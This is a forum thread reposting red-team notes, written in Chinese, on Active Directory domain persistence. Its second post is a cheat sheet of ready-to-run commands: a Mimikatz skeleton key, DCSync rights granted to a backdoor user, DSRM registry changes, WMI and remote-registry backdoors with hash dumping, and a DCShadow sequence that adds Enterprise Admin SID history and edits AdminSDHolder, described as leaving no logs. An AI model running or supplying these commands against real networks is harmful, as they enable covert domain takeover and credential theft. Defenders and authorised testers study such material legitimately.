安全矩阵

 找回密码
 立即注册
搜索
查看: 3419|回复: 1

红队笔记 - 域渗透攻击

[复制链接]

145

主题

192

帖子

817

积分

高级会员

Rank: 4

积分
817
发表于 2021-10-13 17:38:22 | 显示全部楼层 |阅读模式
本帖最后由 littlebird 于 2021-10-13 17:40 编辑

转载自:红队笔记 - 域渗透攻击                                                            
文章来Khan安全攻防实验室
红队笔记 - 域渗透攻击                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    


回复

使用道具 举报

145

主题

192

帖子

817

积分

高级会员

Rank: 4

积分
817
 楼主| 发表于 2021-10-13 17:40:12 | 显示全部楼层
域持久性

        

        必须以DA权限运行


Mimikatz攻击

        

        DC运行为所有用户启用密码 "mimikatz"


  1. privilege::debug
  2. misc::skeleton
复制代码



使用 PowerView 授予特定用户 DCSync 权限

        

        选择的用户授予 DCSync 的权限,在某些设置中可能会逃避检测。


  1. Add-ObjectACL -TargetDistinguishedName "dc=targetdomain,dc=com" -PrincipalSamAccountName BackdoorUser -Rights DCSync
复制代码



域控制器 DSRM 管理员

      

        DSRM 管理员是 DC 的本地管理员帐户,需要先启用远程登录。


  1. New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
复制代码



现在我们可以使用之前转储在 DC 上的本地管理哈希远程登录,使用例如“ overpass -the-hash”来获取会话。


修改远程 WMI 访问的安全描述符

        

        使用Nishang 的 Set-RemoteWMI cmdlet授予用户 WMI 访问计算机的权限。可以运行以持久访问例如 DC。


  1. Set-RemoteWMI -UserName BackdoorUser -ComputerName dc.targetdomain.com -namespace 'root\cimv2'
复制代码



DAMP 修改 DC 注册表安全描述符以进行远程hash检索


        使用DAMP工具我们就可以借壳DC注册表来给我们上的访问SAM,SYSTEM以及SECURITY注册表配置单元,这允许我们远程转储 DChash。


  1. Add-RemoteRegBackdoor -ComputerName dc.targetdomain.com -Trustee BackdoorUser
复制代码



        我们使用Add-RemoteRegBackdoor.ps1来自 DAMP的cmdlet添加后门。


  1. # Get machine account hash for silver ticket attack
  2. Get-RemoteMachineAccountHash -ComputerName DC01

  3. # Get local account hashes
  4. Get-RemoteLocalAccountHash -ComputerName DC01

  5. # Get cached credentials (if any)
  6. Get-RemoteCachedCredential -ComputerName DC01
复制代码



DCShadow


           DCShadow是一种攻击,它通过暂时模仿一个域控制器来掩盖某些行动。如果你在一个根域中拥有域管理员或企业管理员的权限,它可以被用于森林级的持久化。


        作为域管理员,可以选择给一个选定的用户以DCShadow攻击所需的权限(使用Set-DCShadowPermissions.ps1 cmdlet)


  1. Set-DCShadowPermissions -FakeDC BackdoorMachine -SamAccountName TargetUser -Username BackdoorUser -Verbose
复制代码



然后,从任何一台机器上使用Mimikatz来进行DCShadow攻击。


  1. # Set SPN for user
  2. lsadump::dcshadow /object:TargetUser /attribute:servicePrincipalName /value:"SuperHacker/ServicePrincipalThingey"

  3. # Set SID History for user (effectively granting them Enterprise Admin rights)
  4. lsadump::dcshadow /object:TargetUser /attribute:SIDHistory /value:S-1-5-21-280534878-1496970234-700767426-519

  5. # Set Full Control permissions on AdminSDHolder container for user
  6. ## Requires retrieval of current ACL:
  7. (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com")).psbase.ObjectSecurity.sddl

  8. ## Then get target user SID:
  9. Get-NetUser -UserName BackdoorUser | select objectsid

  10. ## Finally, add full control primitive (A;;CCDCLCSWRPWPLOCRRCWDWO;;;[SID]) for user
  11. lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=targetdomain,DC=com /attribute:ntSecurityDescriptor /value:O:DAG:DAD:PAI(A;;LCRPLORC;;;AU)[...currentACL...](A;;CCDCLCSWRPWPLOCRRCWDWO;;;[[S-1-5-21-1874506631-3219952063-538504511-45109]])
复制代码



最后,从DA会话或之前提供DCShadow权限的用户会话,运行DCShadow攻击。之前的动作将被执行,不会留下任何日志。


  1. lsadump::dcshadow /push
复制代码
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:40 , Processed in 0.012665 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表